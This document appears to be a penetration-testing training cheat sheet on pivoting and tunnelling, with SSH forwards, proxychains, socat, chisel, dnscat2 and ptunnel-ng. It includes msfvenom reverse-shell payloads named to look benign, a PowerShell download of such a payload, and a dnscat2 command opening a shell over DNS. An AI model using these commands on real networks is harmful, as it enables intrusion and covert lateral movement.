| Command | Description |
| --- | --- |
| `ifconfig` | Linux command that displays all current network configurations of a system. |
| `ipconfig` | Windows command that displays all system network configurations. |
| `netstat -r` | Displays the routing table for all IPv4-based protocols. |
| `nmap -sT -p22,3306 <IPaddressofTarget>` | Scans a target for open SSH (22) or MySQL (3306) ports using a TCP connect scan. |
| `ssh -L 1234:localhost:3306 ubuntu@<IPaddressofTarget>` | Creates an SSH tunnel forwarding local port 1234 to port 3306 on the remote host over SSH. |
| `netstat -antp \| grep 1234` | Shows all TCP connections (-antp) and filters for those on port 1234. |
| `nmap -v -sV -p1234 localhost` | Scans localhost port 1234 with service/version detection and verbose output. |
| `ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@<IPaddressofTarget>` | Forwards local ports 1234→remote 3306 and 8080→remote 80 in one SSH session. |
| `ssh -D 9050 ubuntu@<IPaddressofTarget>` | Opens a dynamic (SOCKS) proxy on local port 9050 over SSH. |
| `tail -4 /etc/proxychains.conf` | Shows the last 4 lines of your Proxychains configuration to verify SOCKS entries. |
| `proxychains nmap -v -sn 172.16.5.1-200` | Runs an Nmap ping scan (-sn) through your SOCKS proxy for hosts 172.16.5.1-200 with verbose output. Note that Proxychains only relays TCP, so ICMP-based discovery does not traverse the proxy. |
| `proxychains nmap -v -Pn -sT 172.16.5.19` | Runs an Nmap TCP connect scan (-sT) through SOCKS against 172.16.5.19, skipping host discovery (-Pn). |
| `proxychains msfconsole` | Launches Metasploit with all traffic routed through your SOCKS proxy. |
| `msf6 > search rdp_scanner` | Searches Metasploit for modules matching rdp_scanner. |
| `proxychains xfreerdp /v:<IPaddressofTarget> /u:victor /p:pass@123` | Connects via RDP through your SOCKS proxy using FreeRDP with the given credentials. |
| `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> LPORT=8080 -f exe -o backupscript.exe` | Generates a Windows x64 Meterpreter reverse HTTPS payload calling back to LHOST on port 8080, output as backupscript.exe. |
| `msf6 > use exploit/multi/handler` | Selects the multi/handler module in Metasploit (for catching your payload). |
| `scp backupscript.exe ubuntu@<IPaddressofTarget>:~/` | Copies backupscript.exe to the Ubuntu user's home directory on the target. |
| `python3 -m http.server 8123` | Serves the current directory over HTTP on port 8123 (useful for file transfers). |
| `Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"` | PowerShell downloads backupscript.exe from your HTTP server and saves it locally. |
| `ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:80 ubuntu@<IPaddressofTarget> -vN` | Remote (reverse) port forward: the pivot host listens on port 8080 of its internal interface and tunnels connections back to port 80 on the attack host (the SSH client side). -v is verbose, -N runs no remote command. |
| `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost> LPORT=8080 -f elf -o backupjob` | Builds a Linux x64 Meterpreter reverse TCP payload calling back on port 8080, output as backupjob. |
| `msf6 > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23` | Executes a Metasploit ping sweep against the 172.16.5.0/23 subnet. |
| `for i in {1..254}; do ping -c 1 172.16.5.$i \| grep "bytes from" & done` | Bash loop to ping every host in 172.16.5.1-254 once, running each ping in the background and printing only replies. |
| `for /L %i in (1,1,254) do ping 172.16.5.%i -n 1 -w 100 \| find "Reply"` | Windows cmd loop to ping 172.16.5.1-254 once each with a 100 ms timeout, printing only replies. |
| `1..254 \| %{"172.16.5.$($_): $(Test-Connection -Count 1 -ComputerName 172.16.5.$($_) -Quiet)"}` | PowerShell one-liner to test connectivity for every host .1-.254 and print the results. |
| `msf6 > use auxiliary/server/socks_proxy` | Selects Metasploit's SOCKS proxy server module. |
| `msf6 auxiliary(server/socks_proxy) > jobs` | Lists currently running Metasploit jobs (e.g. your SOCKS server). |
| `socks4 127.0.0.1 9050` (added to /etc/proxychains.conf) | Enables a SOCKS4 proxy at 127.0.0.1:9050 in Proxychains. |
| `socks5 127.0.0.1 1080` (added to /etc/proxychains.conf) | Enables a SOCKS5 proxy at 127.0.0.1:1080 in Proxychains. |
| `msf6 > use post/multi/manage/autoroute` | Loads Metasploit's autoroute module (for pivot routing). |
| `meterpreter > help portfwd` | Shows usage for Meterpreter's portfwd command. |
| `meterpreter > portfwd add -l 3300 -p 3389 -r <IPaddressofTarget>` | Forwards local port 3300 to the target's RDP port 3389 within your Meterpreter session. |
| `xfreerdp /v:localhost:3300 /u:victor /p:pass@123` | RDP into localhost:3300 (a forward must be in place) with the specified credentials. |
| `netstat -antp` | Lists all TCP connections (-a), shows PIDs (-p), in numeric form (-n), and only TCP (-t). |
| `meterpreter > portfwd add -R -l 8081 -p 1234 -L <IPaddressofAttackHost>` | Reverse port forward: connections to port 8081 on the compromised host are relayed back to port 1234 on the attack host (-L). |
| `meterpreter > bg` | Backgrounds the current Meterpreter session. |
| `socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofAttackHost>:80` | Listens on local port 8080, forks on each connection, then relays to your attack host on port 80. |
| `socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofTarget>:8443` | Same as above, but relays to the target's port 8443. |
| `plink -D 9050 ubuntu@<IPaddressofTarget>` | PuTTY's Plink for dynamic SOCKS forwarding on Windows (local port 9050). |
| `sudo apt-get install sshuttle` | Installs sshuttle (VPN-like transparent proxy over SSH). |
| `sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/24 -v` | Routes all 172.16.5.0/24 traffic through the SSH server at 10.129.202.64 with verbose logging. |
| `sudo git clone https://github.com/klsecservices/rpivot.git` | Clones the rpivot repository. |
| `sudo apt-get install python2.7` | Installs Python 2.7. |
| `python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0` | Launches the rpivot server: SOCKS listener on port 9050, client connection port 9999, listening on all interfaces. |
| `scp -r rpivot ubuntu@<IPaddressofTarget>:~` | Recursively copies the rpivot directory to the target's home folder. |
| `python2.7 client.py --server-ip 10.10.14.18 --server-port 9999` | Runs the rpivot client, connecting back to your rpivot server. |
| `proxychains firefox-esr <IPaddressofTargetWebServer>:80` | Launches Firefox ESR with all traffic through your SOCKS proxy. |
| `python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <WindowsDomain> --username <username> --password <password>` | Runs the rpivot client through an NTLM-authenticating HTTP proxy. |
| `netsh interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25` | Windows netsh rule to forward local port 8080 (on 10.129.42.198) to 172.16.5.25:3389. |
| `netsh interface portproxy show v4tov4` | Displays the configured v4tov4 portproxy rules. |
| `git clone https://github.com/iagox86/dnscat2.git` | Clones the dnscat2 DNS-tunneling tool. |
| `sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache` | Starts the dnscat2 server on port 53 for the inlanefreight.local domain without DNS caching. |
| `git clone https://github.com/lukebaggett/dnscat2-powershell.git` | Clones the PowerShell client for dnscat2. |
| `Import-Module dnscat2.ps1` | Loads the dnscat2 PowerShell module. |
| `Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd` | Connects the PowerShell client back to your dnscat2 server and opens a command shell. |
| `dnscat2> ?` | Lists available dnscat2 commands. |
| `dnscat2> window -i 1` | Interacts with dnscat2 session window 1. |
| `./chisel server -v -p 1234 --socks5` | Starts a Chisel server in verbose mode on port 1234 with SOCKS5 support. |
| `./chisel client -v 10.129.202.64:1234 socks` | Connects a Chisel client to the server at 10.129.202.64:1234 and exposes a local SOCKS proxy (default 127.0.0.1:1080) tunneled through it. |
| `git clone https://github.com/utoni/ptunnel-ng.git` | Clones the ptunnel-ng repository. |
| `sudo ./autogen.sh` | Builds ptunnel-ng from source. |
| `sudo ./ptunnel-ng -r 10.129.202.64 -R 22` | Starts the ptunnel-ng server on the pivot host; -r/-R set the destination (10.129.202.64:22) that tunneled traffic is relayed to. |
| `sudo ./ptunnel-ng -p 10.129.202.64 -l 2222 -r 10.129.202.64 -R 22` | Runs the ptunnel-ng client: connects over ICMP to the proxy at 10.129.202.64 (-p), listens locally on port 2222 (-l), and relays to 10.129.202.64:22. |
| `ssh -p 2222 -l ubuntu 127.0.0.1` | SSH into localhost:2222 (e.g. through the ptunnel-ng ICMP tunnel). |
| `regsvr32 SocksOverRDP-Plugin.dll` | Registers the SocksOverRDP plugin on Windows. |
| `netstat -antb \| findstr 1080` | Lists all TCP connections with the owning executable (-b) and filters for those on port 1080. |